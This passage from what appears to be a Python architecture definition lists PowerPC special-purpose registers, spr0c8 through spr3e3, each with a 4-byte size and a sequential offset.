Register('spr0c8', 4, 0x1320),
Register('spr0c9', 4, 0x1324),
Register('spr0ca', 4, 0x1328),
Register('spr0cb', 4, 0x132c),
Register('spr0cc', 4, 0x1330),
Register('spr0cd', 4, 0x1334),
Register('spr0ce', 4, 0x1338),
Register('spr0cf', 4, 0x133c),
Register('spr0d0', 4, 0x1340),
Register('spr0d1', 4, 0x1344),
Register('spr0d2', 4, 0x1348),
Register('spr0d3', 4, 0x134c),
Register('spr0d4', 4, 0x1350),
Register('spr0d5', 4, 0x1354),
Register('spr0d6', 4, 0x1358),
Register('spr0d7', 4, 0x135c),
Register('spr0d8', 4, 0x1360),
Register('spr0d9', 4, 0x1364),
Register('spr0da', 4, 0x1368),
Register('spr0db', 4, 0x136c),
Register('spr0dc', 4, 0x1370),
Register('spr0dd', 4, 0x1374),
Register('spr0de', 4, 0x1378),
Register('spr0df', 4, 0x137c),
Register('spr0e0', 4, 0x1380),
Register('spr0e1', 4, 0x1384),
Register('spr0e2', 4, 0x1388),
Register('spr0e3', 4, 0x138c),
Register('spr0e4', 4, 0x1390),
Register('spr0e5', 4, 0x1394),
Register('spr0e6', 4, 0x1398),
Register('spr0e7', 4, 0x139c),
Register('spr0e8', 4, 0x13a0),
Register('spr0e9', 4, 0x13a4),
Register('spr0ea', 4, 0x13a8),
Register('spr0eb', 4, 0x13ac),
Register('spr0ec', 4, 0x13b0),
Register('spr0ed', 4, 0x13b4),
Register('spr0ee', 4, 0x13b8),
Register('spr0ef', 4, 0x13bc),
Register('spr0f0', 4, 0x13c0),
Register('spr0f1', 4, 0x13c4),
Register('spr0f2', 4, 0x13c8),
Register('spr0f3', 4, 0x13cc),
Register('spr0f4', 4, 0x13d0),
Register('spr0f5', 4, 0x13d4),
Register('spr0f6', 4, 0x13d8),
Register('spr0f7', 4, 0x13dc),
Register('spr0f8', 4, 0x13e0),
Register('spr0f9', 4, 0x13e4),
Register('spr0fa', 4, 0x13e8),
Register('spr0fb', 4, 0x13ec),
Register('spr0fc', 4, 0x13f0),
Register('spr0fd', 4, 0x13f4),
Register('spr0fe', 4, 0x13f8),
Register('spr0ff', 4, 0x13fc),
Register('spr100', 4, 0x1400),
Register('spr101', 4, 0x1404),
Register('spr102', 4, 0x1408),
Register('spr103', 4, 0x140c),
Register('spr104', 4, 0x1410),
Register('spr105', 4, 0x1414),
Register('spr106', 4, 0x1418),
Register('spr107', 4, 0x141c),
Register('spr108', 4, 0x1420),
Register('spr109', 4, 0x1424),
Register('spr10a', 4, 0x1428),
Register('spr10b', 4, 0x142c),
Register('tblr', 4, 0x1430),
Register('tbur', 4, 0x1434),
Register('spr10e', 4, 0x1438),
Register('spr10f', 4, 0x143c),
Register('spr110', 4, 0x1440),
Register('spr111', 4, 0x1444),
Register('spr112', 4, 0x1448),
Register('spr113', 4, 0x144c),
Register('spr114', 4, 0x1450),
Register('spr115', 4, 0x1454),
Register('spr116', 4, 0x1458),
Register('spr117', 4, 0x145c),
Register('spr118', 4, 0x1460),
Register('spr119', 4, 0x1464),
Register('spr11a', 4, 0x1468),
Register('spr11b', 4, 0x146c),
Register('tblw', 4, 0x1470),
Register('tbuw', 4, 0x1474),
Register('spr11e', 4, 0x1478),
Register('spr11f', 4, 0x147c),
Register('spr120', 4, 0x1480),
Register('spr121', 4, 0x1484),
Register('spr122', 4, 0x1488),
Register('spr123', 4, 0x148c),
Register('spr124', 4, 0x1490),
Register('spr125', 4, 0x1494),
Register('spr126', 4, 0x1498),
Register('spr127', 4, 0x149c),
Register('spr128', 4, 0x14a0),
Register('spr129', 4, 0x14a4),
Register('spr12a', 4, 0x14a8),
Register('spr12b', 4, 0x14ac),
Register('spr12c', 4, 0x14b0),
Register('spr12d', 4, 0x14b4),
Register('spr12e', 4, 0x14b8),
Register('spr12f', 4, 0x14bc),
Register('spr130', 4, 0x14c0),
Register('spr131', 4, 0x14c4),
Register('spr132', 4, 0x14c8),
Register('spr133', 4, 0x14cc),
Register('spr134', 4, 0x14d0),
Register('spr135', 4, 0x14d4),
Register('spr136', 4, 0x14d8),
Register('spr137', 4, 0x14dc),
Register('spr138', 4, 0x14e0),
Register('spr139', 4, 0x14e4),
Register('spr13a', 4, 0x14e8),
Register('spr13b', 4, 0x14ec),
Register('spr13c', 4, 0x14f0),
Register('spr13d', 4, 0x14f4),
Register('spr13e', 4, 0x14f8),
Register('spr13f', 4, 0x14fc),
Register('spr140', 4, 0x1500),
Register('spr141', 4, 0x1504),
Register('spr142', 4, 0x1508),
Register('spr143', 4, 0x150c),
Register('spr144', 4, 0x1510),
Register('spr145', 4, 0x1514),
Register('spr146', 4, 0x1518),
Register('spr147', 4, 0x151c),
Register('spr148', 4, 0x1520),
Register('spr149', 4, 0x1524),
Register('spr14a', 4, 0x1528),
Register('spr14b', 4, 0x152c),
Register('spr14c', 4, 0x1530),
Register('spr14d', 4, 0x1534),
Register('spr14e', 4, 0x1538),
Register('spr14f', 4, 0x153c),
Register('spr150', 4, 0x1540),
Register('spr151', 4, 0x1544),
Register('spr152', 4, 0x1548),
Register('spr153', 4, 0x154c),
Register('spr154', 4, 0x1550),
Register('spr155', 4, 0x1554),
Register('spr156', 4, 0x1558),
Register('spr157', 4, 0x155c),
Register('spr158', 4, 0x1560),
Register('spr159', 4, 0x1564),
Register('spr15a', 4, 0x1568),
Register('spr15b', 4, 0x156c),
Register('spr15c', 4, 0x1570),
Register('spr15d', 4, 0x1574),
Register('spr15e', 4, 0x1578),
Register('spr15f', 4, 0x157c),
Register('spr160', 4, 0x1580),
Register('spr161', 4, 0x1584),
Register('spr162', 4, 0x1588),
Register('spr163', 4, 0x158c),
Register('spr164', 4, 0x1590),
Register('spr165', 4, 0x1594),
Register('spr166', 4, 0x1598),
Register('spr167', 4, 0x159c),
Register('spr168', 4, 0x15a0),
Register('spr169', 4, 0x15a4),
Register('spr16a', 4, 0x15a8),
Register('spr16b', 4, 0x15ac),
Register('spr16c', 4, 0x15b0),
Register('spr16d', 4, 0x15b4),
Register('spr16e', 4, 0x15b8),
Register('spr16f', 4, 0x15bc),
Register('spr170', 4, 0x15c0),
Register('spr171', 4, 0x15c4),
Register('spr172', 4, 0x15c8),
Register('spr173', 4, 0x15cc),
Register('spr174', 4, 0x15d0),
Register('spr175', 4, 0x15d4),
Register('spr176', 4, 0x15d8),
Register('spr177', 4, 0x15dc),
Register('spr178', 4, 0x15e0),
Register('spr179', 4, 0x15e4),
Register('spr17a', 4, 0x15e8),
Register('spr17b', 4, 0x15ec),
Register('spr17c', 4, 0x15f0),
Register('spr17d', 4, 0x15f4),
Register('spr17e', 4, 0x15f8),
Register('spr17f', 4, 0x15fc),
Register('spr180', 4, 0x1600),
Register('spr181', 4, 0x1604),
Register('spr182', 4, 0x1608),
Register('spr183', 4, 0x160c),
Register('spr184', 4, 0x1610),
Register('spr185', 4, 0x1614),
Register('spr186', 4, 0x1618),
Register('spr187', 4, 0x161c),
Register('spr188', 4, 0x1620),
Register('spr189', 4, 0x1624),
Register('spr18a', 4, 0x1628),
Register('spr18b', 4, 0x162c),
Register('spr18c', 4, 0x1630),
Register('spr18d', 4, 0x1634),
Register('spr18e', 4, 0x1638),
Register('spr18f', 4, 0x163c),
Register('spr190', 4, 0x1640),
Register('spr191', 4, 0x1644),
Register('spr192', 4, 0x1648),
Register('spr193', 4, 0x164c),
Register('spr194', 4, 0x1650),
Register('spr195', 4, 0x1654),
Register('spr196', 4, 0x1658),
Register('spr197', 4, 0x165c),
Register('spr198', 4, 0x1660),
Register('spr199', 4, 0x1664),
Register('spr19a', 4, 0x1668),
Register('spr19b', 4, 0x166c),
Register('spr19c', 4, 0x1670),
Register('spr19d', 4, 0x1674),
Register('spr19e', 4, 0x1678),
Register('spr19f', 4, 0x167c),
Register('spr1a0', 4, 0x1680),
Register('spr1a1', 4, 0x1684),
Register('spr1a2', 4, 0x1688),
Register('spr1a3', 4, 0x168c),
Register('spr1a4', 4, 0x1690),
Register('spr1a5', 4, 0x1694),
Register('spr1a6', 4, 0x1698),
Register('spr1a7', 4, 0x169c),
Register('spr1a8', 4, 0x16a0),
Register('spr1a9', 4, 0x16a4),
Register('spr1aa', 4, 0x16a8),
Register('spr1ab', 4, 0x16ac),
Register('spr1ac', 4, 0x16b0),
Register('spr1ad', 4, 0x16b4),
Register('spr1ae', 4, 0x16b8),
Register('spr1af', 4, 0x16bc),
Register('spr1b0', 4, 0x16c0),
Register('spr1b1', 4, 0x16c4),
Register('spr1b2', 4, 0x16c8),
Register('spr1b3', 4, 0x16cc),
Register('spr1b4', 4, 0x16d0),
Register('spr1b5', 4, 0x16d4),
Register('spr1b6', 4, 0x16d8),
Register('spr1b7', 4, 0x16dc),
Register('spr1b8', 4, 0x16e0),
Register('spr1b9', 4, 0x16e4),
Register('spr1ba', 4, 0x16e8),
Register('spr1bb', 4, 0x16ec),
Register('spr1bc', 4, 0x16f0),
Register('spr1bd', 4, 0x16f4),
Register('spr1be', 4, 0x16f8),
Register('spr1bf', 4, 0x16fc),
Register('spr1c0', 4, 0x1700),
Register('spr1c1', 4, 0x1704),
Register('spr1c2', 4, 0x1708),
Register('spr1c3', 4, 0x170c),
Register('spr1c4', 4, 0x1710),
Register('spr1c5', 4, 0x1714),
Register('spr1c6', 4, 0x1718),
Register('spr1c7', 4, 0x171c),
Register('spr1c8', 4, 0x1720),
Register('spr1c9', 4, 0x1724),
Register('spr1ca', 4, 0x1728),
Register('spr1cb', 4, 0x172c),
Register('spr1cc', 4, 0x1730),
Register('spr1cd', 4, 0x1734),
Register('spr1ce', 4, 0x1738),
Register('spr1cf', 4, 0x173c),
Register('spr1d0', 4, 0x1740),
Register('spr1d1', 4, 0x1744),
Register('spr1d2', 4, 0x1748),
Register('spr1d3', 4, 0x174c),
Register('spr1d4', 4, 0x1750),
Register('spr1d5', 4, 0x1754),
Register('spr1d6', 4, 0x1758),
Register('spr1d7', 4, 0x175c),
Register('spr1d8', 4, 0x1760),
Register('spr1d9', 4, 0x1764),
Register('spr1da', 4, 0x1768),
Register('spr1db', 4, 0x176c),
Register('spr1dc', 4, 0x1770),
Register('spr1dd', 4, 0x1774),
Register('spr1de', 4, 0x1778),
Register('spr1df', 4, 0x177c),
Register('spr1e0', 4, 0x1780),
Register('spr1e1', 4, 0x1784),
Register('spr1e2', 4, 0x1788),
Register('spr1e3', 4, 0x178c),
Register('spr1e4', 4, 0x1790),
Register('spr1e5', 4, 0x1794),
Register('spr1e6', 4, 0x1798),
Register('spr1e7', 4, 0x179c),
Register('spr1e8', 4, 0x17a0),
Register('spr1e9', 4, 0x17a4),
Register('spr1ea', 4, 0x17a8),
Register('spr1eb', 4, 0x17ac),
Register('spr1ec', 4, 0x17b0),
Register('spr1ed', 4, 0x17b4),
Register('spr1ee', 4, 0x17b8),
Register('spr1ef', 4, 0x17bc),
Register('spr1f0', 4, 0x17c0),
Register('spr1f1', 4, 0x17c4),
Register('spr1f2', 4, 0x17c8),
Register('spr1f3', 4, 0x17cc),
Register('spr1f4', 4, 0x17d0),
Register('spr1f5', 4, 0x17d4),
Register('spr1f6', 4, 0x17d8),
Register('spr1f7', 4, 0x17dc),
Register('spr1f8', 4, 0x17e0),
Register('spr1f9', 4, 0x17e4),
Register('spr1fa', 4, 0x17e8),
Register('spr1fb', 4, 0x17ec),
Register('spr1fc', 4, 0x17f0),
Register('spr1fd', 4, 0x17f4),
Register('spr1fe', 4, 0x17f8),
Register('spr1ff', 4, 0x17fc),
Register('spr200', 4, 0x1800),
Register('spr201', 4, 0x1804),
Register('spr202', 4, 0x1808),
Register('spr203', 4, 0x180c),
Register('spr204', 4, 0x1810),
Register('spr205', 4, 0x1814),
Register('spr206', 4, 0x1818),
Register('spr207', 4, 0x181c),
Register('spr208', 4, 0x1820),
Register('spr209', 4, 0x1824),
Register('spr20a', 4, 0x1828),
Register('spr20b', 4, 0x182c),
Register('spr20c', 4, 0x1830),
Register('spr20d', 4, 0x1834),
Register('spr20e', 4, 0x1838),
Register('spr20f', 4, 0x183c),
Register('spr210', 4, 0x1840),
Register('spr211', 4, 0x1844),
Register('spr212', 4, 0x1848),
Register('spr213', 4, 0x184c),
Register('spr214', 4, 0x1850),
Register('spr215', 4, 0x1854),
Register('spr216', 4, 0x1858),
Register('spr217', 4, 0x185c),
Register('spr218', 4, 0x1860),
Register('spr219', 4, 0x1864),
Register('spr21a', 4, 0x1868),
Register('spr21b', 4, 0x186c),
Register('spr21c', 4, 0x1870),
Register('spr21d', 4, 0x1874),
Register('spr21e', 4, 0x1878),
Register('spr21f', 4, 0x187c),
Register('spr220', 4, 0x1880),
Register('spr221', 4, 0x1884),
Register('spr222', 4, 0x1888),
Register('spr223', 4, 0x188c),
Register('spr224', 4, 0x1890),
Register('spr225', 4, 0x1894),
Register('spr226', 4, 0x1898),
Register('spr227', 4, 0x189c),
Register('spr228', 4, 0x18a0),
Register('spr229', 4, 0x18a4),
Register('spr22a', 4, 0x18a8),
Register('spr22b', 4, 0x18ac),
Register('spr22c', 4, 0x18b0),
Register('spr22d', 4, 0x18b4),
Register('spr22e', 4, 0x18b8),
Register('spr22f', 4, 0x18bc),
Register('spr230', 4, 0x18c0),
Register('spr231', 4, 0x18c4),
Register('spr232', 4, 0x18c8),
Register('spr233', 4, 0x18cc),
Register('spr234', 4, 0x18d0),
Register('spr235', 4, 0x18d4),
Register('spr236', 4, 0x18d8),
Register('spr237', 4, 0x18dc),
Register('spr238', 4, 0x18e0),
Register('spr239', 4, 0x18e4),
Register('spr23a', 4, 0x18e8),
Register('spr23b', 4, 0x18ec),
Register('spr23c', 4, 0x18f0),
Register('spr23d', 4, 0x18f4),
Register('spr23e', 4, 0x18f8),
Register('spr23f', 4, 0x18fc),
Register('spr240', 4, 0x1900),
Register('spr241', 4, 0x1904),
Register('spr242', 4, 0x1908),
Register('spr243', 4, 0x190c),
Register('spr244', 4, 0x1910),
Register('spr245', 4, 0x1914),
Register('spr246', 4, 0x1918),
Register('spr247', 4, 0x191c),
Register('spr248', 4, 0x1920),
Register('spr249', 4, 0x1924),
Register('spr24a', 4, 0x1928),
Register('spr24b', 4, 0x192c),
Register('spr24c', 4, 0x1930),
Register('spr24d', 4, 0x1934),
Register('spr24e', 4, 0x1938),
Register('spr24f', 4, 0x193c),
Register('spr250', 4, 0x1940),
Register('spr251', 4, 0x1944),
Register('spr252', 4, 0x1948),
Register('spr253', 4, 0x194c),
Register('spr254', 4, 0x1950),
Register('spr255', 4, 0x1954),
Register('spr256', 4, 0x1958),
Register('spr257', 4, 0x195c),
Register('spr258', 4, 0x1960),
Register('spr259', 4, 0x1964),
Register('spr25a', 4, 0x1968),
Register('spr25b', 4, 0x196c),
Register('spr25c', 4, 0x1970),
Register('spr25d', 4, 0x1974),
Register('spr25e', 4, 0x1978),
Register('spr25f', 4, 0x197c),
Register('spr260', 4, 0x1980),
Register('spr261', 4, 0x1984),
Register('spr262', 4, 0x1988),
Register('spr263', 4, 0x198c),
Register('spr264', 4, 0x1990),
Register('spr265', 4, 0x1994),
Register('spr266', 4, 0x1998),
Register('spr267', 4, 0x199c),
Register('spr268', 4, 0x19a0),
Register('spr269', 4, 0x19a4),
Register('spr26a', 4, 0x19a8),
Register('spr26b', 4, 0x19ac),
Register('spr26c', 4, 0x19b0),
Register('spr26d', 4, 0x19b4),
Register('spr26e', 4, 0x19b8),
Register('spr26f', 4, 0x19bc),
Register('spr270', 4, 0x19c0),
Register('spr271', 4, 0x19c4),
Register('spr272', 4, 0x19c8),
Register('spr273', 4, 0x19cc),
Register('spr274', 4, 0x19d0),
Register('spr275', 4, 0x19d4),
Register('spr276', 4, 0x19d8),
Register('spr277', 4, 0x19dc),
Register('spr278', 4, 0x19e0),
Register('spr279', 4, 0x19e4),
Register('spr27a', 4, 0x19e8),
Register('spr27b', 4, 0x19ec),
Register('spr27c', 4, 0x19f0),
Register('spr27d', 4, 0x19f4),
Register('spr27e', 4, 0x19f8),
Register('spr27f', 4, 0x19fc),
Register('spr280', 4, 0x1a00),
Register('spr281', 4, 0x1a04),
Register('spr282', 4, 0x1a08),
Register('spr283', 4, 0x1a0c),
Register('spr284', 4, 0x1a10),
Register('spr285', 4, 0x1a14),
Register('spr286', 4, 0x1a18),
Register('spr287', 4, 0x1a1c),
Register('spr288', 4, 0x1a20),
Register('spr289', 4, 0x1a24),
Register('spr28a', 4, 0x1a28),
Register('spr28b', 4, 0x1a2c),
Register('spr28c', 4, 0x1a30),
Register('spr28d', 4, 0x1a34),
Register('spr28e', 4, 0x1a38),
Register('spr28f', 4, 0x1a3c),
Register('spr290', 4, 0x1a40),
Register('spr291', 4, 0x1a44),
Register('spr292', 4, 0x1a48),
Register('spr293', 4, 0x1a4c),
Register('spr294', 4, 0x1a50),
Register('spr295', 4, 0x1a54),
Register('spr296', 4, 0x1a58),
Register('spr297', 4, 0x1a5c),
Register('spr298', 4, 0x1a60),
Register('spr299', 4, 0x1a64),
Register('spr29a', 4, 0x1a68),
Register('spr29b', 4, 0x1a6c),
Register('spr29c', 4, 0x1a70),
Register('spr29d', 4, 0x1a74),
Register('spr29e', 4, 0x1a78),
Register('spr29f', 4, 0x1a7c),
Register('spr2a0', 4, 0x1a80),
Register('spr2a1', 4, 0x1a84),
Register('spr2a2', 4, 0x1a88),
Register('spr2a3', 4, 0x1a8c),
Register('spr2a4', 4, 0x1a90),
Register('spr2a5', 4, 0x1a94),
Register('spr2a6', 4, 0x1a98),
Register('spr2a7', 4, 0x1a9c),
Register('spr2a8', 4, 0x1aa0),
Register('spr2a9', 4, 0x1aa4),
Register('spr2aa', 4, 0x1aa8),
Register('spr2ab', 4, 0x1aac),
Register('spr2ac', 4, 0x1ab0),
Register('spr2ad', 4, 0x1ab4),
Register('spr2ae', 4, 0x1ab8),
Register('spr2af', 4, 0x1abc),
Register('spr2b0', 4, 0x1ac0),
Register('spr2b1', 4, 0x1ac4),
Register('spr2b2', 4, 0x1ac8),
Register('spr2b3', 4, 0x1acc),
Register('spr2b4', 4, 0x1ad0),
Register('spr2b5', 4, 0x1ad4),
Register('spr2b6', 4, 0x1ad8),
Register('spr2b7', 4, 0x1adc),
Register('spr2b8', 4, 0x1ae0),
Register('spr2b9', 4, 0x1ae4),
Register('spr2ba', 4, 0x1ae8),
Register('spr2bb', 4, 0x1aec),
Register('spr2bc', 4, 0x1af0),
Register('spr2bd', 4, 0x1af4),
Register('spr2be', 4, 0x1af8),
Register('spr2bf', 4, 0x1afc),
Register('spr2c0', 4, 0x1b00),
Register('spr2c1', 4, 0x1b04),
Register('spr2c2', 4, 0x1b08),
Register('spr2c3', 4, 0x1b0c),
Register('spr2c4', 4, 0x1b10),
Register('spr2c5', 4, 0x1b14),
Register('spr2c6', 4, 0x1b18),
Register('spr2c7', 4, 0x1b1c),
Register('spr2c8', 4, 0x1b20),
Register('spr2c9', 4, 0x1b24),
Register('spr2ca', 4, 0x1b28),
Register('spr2cb', 4, 0x1b2c),
Register('spr2cc', 4, 0x1b30),
Register('spr2cd', 4, 0x1b34),
Register('spr2ce', 4, 0x1b38),
Register('spr2cf', 4, 0x1b3c),
Register('spr2d0', 4, 0x1b40),
Register('spr2d1', 4, 0x1b44),
Register('spr2d2', 4, 0x1b48),
Register('spr2d3', 4, 0x1b4c),
Register('spr2d4', 4, 0x1b50),
Register('spr2d5', 4, 0x1b54),
Register('spr2d6', 4, 0x1b58),
Register('spr2d7', 4, 0x1b5c),
Register('spr2d8', 4, 0x1b60),
Register('spr2d9', 4, 0x1b64),
Register('spr2da', 4, 0x1b68),
Register('spr2db', 4, 0x1b6c),
Register('spr2dc', 4, 0x1b70),
Register('spr2dd', 4, 0x1b74),
Register('spr2de', 4, 0x1b78),
Register('spr2df', 4, 0x1b7c),
Register('spr2e0', 4, 0x1b80),
Register('spr2e1', 4, 0x1b84),
Register('spr2e2', 4, 0x1b88),
Register('spr2e3', 4, 0x1b8c),
Register('spr2e4', 4, 0x1b90),
Register('spr2e5', 4, 0x1b94),
Register('spr2e6', 4, 0x1b98),
Register('spr2e7', 4, 0x1b9c),
Register('spr2e8', 4, 0x1ba0),
Register('spr2e9', 4, 0x1ba4),
Register('spr2ea', 4, 0x1ba8),
Register('spr2eb', 4, 0x1bac),
Register('spr2ec', 4, 0x1bb0),
Register('spr2ed', 4, 0x1bb4),
Register('spr2ee', 4, 0x1bb8),
Register('spr2ef', 4, 0x1bbc),
Register('spr2f0', 4, 0x1bc0),
Register('spr2f1', 4, 0x1bc4),
Register('spr2f2', 4, 0x1bc8),
Register('spr2f3', 4, 0x1bcc),
Register('spr2f4', 4, 0x1bd0),
Register('spr2f5', 4, 0x1bd4),
Register('spr2f6', 4, 0x1bd8),
Register('spr2f7', 4, 0x1bdc),
Register('spr2f8', 4, 0x1be0),
Register('spr2f9', 4, 0x1be4),
Register('spr2fa', 4, 0x1be8),
Register('spr2fb', 4, 0x1bec),
Register('spr2fc', 4, 0x1bf0),
Register('spr2fd', 4, 0x1bf4),
Register('spr2fe', 4, 0x1bf8),
Register('spr2ff', 4, 0x1bfc),
Register('spr300', 4, 0x1c00),
Register('spr301', 4, 0x1c04),
Register('spr302', 4, 0x1c08),
Register('spr303', 4, 0x1c0c),
Register('spr304', 4, 0x1c10),
Register('spr305', 4, 0x1c14),
Register('spr306', 4, 0x1c18),
Register('spr307', 4, 0x1c1c),
Register('spr308', 4, 0x1c20),
Register('spr309', 4, 0x1c24),
Register('spr30a', 4, 0x1c28),
Register('spr30b', 4, 0x1c2c),
Register('spr30c', 4, 0x1c30),
Register('spr30d', 4, 0x1c34),
Register('spr30e', 4, 0x1c38),
Register('spr30f', 4, 0x1c3c),
Register('spr310', 4, 0x1c40),
Register('spr311', 4, 0x1c44),
Register('spr312', 4, 0x1c48),
Register('spr313', 4, 0x1c4c),
Register('spr314', 4, 0x1c50),
Register('spr315', 4, 0x1c54),
Register('spr316', 4, 0x1c58),
Register('spr317', 4, 0x1c5c),
Register('spr318', 4, 0x1c60),
Register('spr319', 4, 0x1c64),
Register('spr31a', 4, 0x1c68),
Register('spr31b', 4, 0x1c6c),
Register('spr31c', 4, 0x1c70),
Register('spr31d', 4, 0x1c74),
Register('spr31e', 4, 0x1c78),
Register('spr31f', 4, 0x1c7c),
Register('spr320', 4, 0x1c80),
Register('spr321', 4, 0x1c84),
Register('spr322', 4, 0x1c88),
Register('spr323', 4, 0x1c8c),
Register('spr324', 4, 0x1c90),
Register('spr325', 4, 0x1c94),
Register('spr326', 4, 0x1c98),
Register('spr327', 4, 0x1c9c),
Register('spr328', 4, 0x1ca0),
Register('spr329', 4, 0x1ca4),
Register('spr32a', 4, 0x1ca8),
Register('spr32b', 4, 0x1cac),
Register('spr32c', 4, 0x1cb0),
Register('spr32d', 4, 0x1cb4),
Register('spr32e', 4, 0x1cb8),
Register('tar', 4, 0x1cbc),
Register('spr330', 4, 0x1cc0),
Register('spr331', 4, 0x1cc4),
Register('spr332', 4, 0x1cc8),
Register('spr333', 4, 0x1ccc),
Register('spr334', 4, 0x1cd0),
Register('spr335', 4, 0x1cd4),
Register('spr336', 4, 0x1cd8),
Register('spr337', 4, 0x1cdc),
Register('spr338', 4, 0x1ce0),
Register('spr339', 4, 0x1ce4),
Register('spr33a', 4, 0x1ce8),
Register('spr33b', 4, 0x1cec),
Register('spr33c', 4, 0x1cf0),
Register('spr33d', 4, 0x1cf4),
Register('spr33e', 4, 0x1cf8),
Register('spr33f', 4, 0x1cfc),
Register('spr340', 4, 0x1d00),
Register('spr341', 4, 0x1d04),
Register('spr342', 4, 0x1d08),
Register('spr343', 4, 0x1d0c),
Register('spr344', 4, 0x1d10),
Register('spr345', 4, 0x1d14),
Register('spr346', 4, 0x1d18),
Register('spr347', 4, 0x1d1c),
Register('spr348', 4, 0x1d20),
Register('spr349', 4, 0x1d24),
Register('spr34a', 4, 0x1d28),
Register('spr34b', 4, 0x1d2c),
Register('spr34c', 4, 0x1d30),
Register('spr34d', 4, 0x1d34),
Register('spr34e', 4, 0x1d38),
Register('spr34f', 4, 0x1d3c),
Register('spr350', 4, 0x1d40),
Register('spr351', 4, 0x1d44),
Register('spr352', 4, 0x1d48),
Register('spr353', 4, 0x1d4c),
Register('spr354', 4, 0x1d50),
Register('spr355', 4, 0x1d54),
Register('spr356', 4, 0x1d58),
Register('spr357', 4, 0x1d5c),
Register('spr358', 4, 0x1d60),
Register('spr359', 4, 0x1d64),
Register('spr35a', 4, 0x1d68),
Register('spr35b', 4, 0x1d6c),
Register('spr35c', 4, 0x1d70),
Register('spr35d', 4, 0x1d74),
Register('spr35e', 4, 0x1d78),
Register('spr35f', 4, 0x1d7c),
Register('spr360', 4, 0x1d80),
Register('spr361', 4, 0x1d84),
Register('spr362', 4, 0x1d88),
Register('spr363', 4, 0x1d8c),
Register('spr364', 4, 0x1d90),
Register('spr365', 4, 0x1d94),
Register('spr366', 4, 0x1d98),
Register('spr367', 4, 0x1d9c),
Register('spr368', 4, 0x1da0),
Register('spr369', 4, 0x1da4),
Register('spr36a', 4, 0x1da8),
Register('spr36b', 4, 0x1dac),
Register('spr36c', 4, 0x1db0),
Register('spr36d', 4, 0x1db4),
Register('spr36e', 4, 0x1db8),
Register('spr36f', 4, 0x1dbc),
Register('spr370', 4, 0x1dc0),
Register('spr371', 4, 0x1dc4),
Register('spr372', 4, 0x1dc8),
Register('spr373', 4, 0x1dcc),
Register('spr374', 4, 0x1dd0),
Register('spr375', 4, 0x1dd4),
Register('spr376', 4, 0x1dd8),
Register('spr377', 4, 0x1ddc),
Register('spr378', 4, 0x1de0),
Register('spr379', 4, 0x1de4),
Register('spr37a', 4, 0x1de8),
Register('spr37b', 4, 0x1dec),
Register('spr37c', 4, 0x1df0),
Register('spr37d', 4, 0x1df4),
Register('spr37e', 4, 0x1df8),
Register('spr37f', 4, 0x1dfc),
Register('spr380', 4, 0x1e00),
Register('spr381', 4, 0x1e04),
Register('spr382', 4, 0x1e08),
Register('spr383', 4, 0x1e0c),
Register('spr384', 4, 0x1e10),
Register('spr385', 4, 0x1e14),
Register('spr386', 4, 0x1e18),
Register('spr387', 4, 0x1e1c),
Register('spr388', 4, 0x1e20),
Register('spr389', 4, 0x1e24),
Register('spr38a', 4, 0x1e28),
Register('spr38b', 4, 0x1e2c),
Register('spr38c', 4, 0x1e30),
Register('spr38d', 4, 0x1e34),
Register('spr38e', 4, 0x1e38),
Register('spr38f', 4, 0x1e3c),
Register('spr390', 4, 0x1e40),
Register('spr391', 4, 0x1e44),
Register('spr392', 4, 0x1e48),
Register('spr393', 4, 0x1e4c),
Register('spr394', 4, 0x1e50),
Register('spr395', 4, 0x1e54),
Register('spr396', 4, 0x1e58),
Register('spr397', 4, 0x1e5c),
Register('spr398', 4, 0x1e60),
Register('spr399', 4, 0x1e64),
Register('spr39a', 4, 0x1e68),
Register('spr39b', 4, 0x1e6c),
Register('spr39c', 4, 0x1e70),
Register('spr39d', 4, 0x1e74),
Register('spr39e', 4, 0x1e78),
Register('spr39f', 4, 0x1e7c),
Register('spr3a0', 4, 0x1e80),
Register('spr3a1', 4, 0x1e84),
Register('spr3a2', 4, 0x1e88),
Register('spr3a3', 4, 0x1e8c),
Register('spr3a4', 4, 0x1e90),
Register('spr3a5', 4, 0x1e94),
Register('spr3a6', 4, 0x1e98),
Register('spr3a7', 4, 0x1e9c),
Register('spr3a8', 4, 0x1ea0),
Register('spr3a9', 4, 0x1ea4),
Register('spr3aa', 4, 0x1ea8),
Register('spr3ab', 4, 0x1eac),
Register('spr3ac', 4, 0x1eb0),
Register('spr3ad', 4, 0x1eb4),
Register('spr3ae', 4, 0x1eb8),
Register('spr3af', 4, 0x1ebc),
Register('spr3b0', 4, 0x1ec0),
Register('spr3b1', 4, 0x1ec4),
Register('spr3b2', 4, 0x1ec8),
Register('spr3b3', 4, 0x1ecc),
Register('spr3b4', 4, 0x1ed0),
Register('spr3b5', 4, 0x1ed4),
Register('spr3b6', 4, 0x1ed8),
Register('spr3b7', 4, 0x1edc),
Register('spr3b8', 4, 0x1ee0),
Register('spr3b9', 4, 0x1ee4),
Register('spr3ba', 4, 0x1ee8),
Register('spr3bb', 4, 0x1eec),
Register('spr3bc', 4, 0x1ef0),
Register('spr3bd', 4, 0x1ef4),
Register('spr3be', 4, 0x1ef8),
Register('spr3bf', 4, 0x1efc),
Register('spr3c0', 4, 0x1f00),
Register('spr3c1', 4, 0x1f04),
Register('spr3c2', 4, 0x1f08),
Register('spr3c3', 4, 0x1f0c),
Register('spr3c4', 4, 0x1f10),
Register('spr3c5', 4, 0x1f14),
Register('spr3c6', 4, 0x1f18),
Register('spr3c7', 4, 0x1f1c),
Register('spr3c8', 4, 0x1f20),
Register('spr3c9', 4, 0x1f24),
Register('spr3ca', 4, 0x1f28),
Register('spr3cb', 4, 0x1f2c),
Register('spr3cc', 4, 0x1f30),
Register('spr3cd', 4, 0x1f34),
Register('spr3ce', 4, 0x1f38),
Register('spr3cf', 4, 0x1f3c),
Register('spr3d0', 4, 0x1f40),
Register('spr3d1', 4, 0x1f44),
Register('spr3d2', 4, 0x1f48),
Register('spr3d3', 4, 0x1f4c),
Register('spr3d4', 4, 0x1f50),
Register('spr3d5', 4, 0x1f54),
Register('spr3d6', 4, 0x1f58),
Register('spr3d7', 4, 0x1f5c),
Register('spr3d8', 4, 0x1f60),
Register('spr3d9', 4, 0x1f64),
Register('spr3da', 4, 0x1f68),
Register('spr3db', 4, 0x1f6c),
Register('spr3dc', 4, 0x1f70),
Register('spr3dd', 4, 0x1f74),
Register('spr3de', 4, 0x1f78),
Register('spr3df', 4, 0x1f7c),
Register('spr3e0', 4, 0x1f80),
Register('spr3e1', 4, 0x1f84),
Register('spr3e2', 4, 0x1f88),
Register('spr3e3', 4, 0x1f8c),
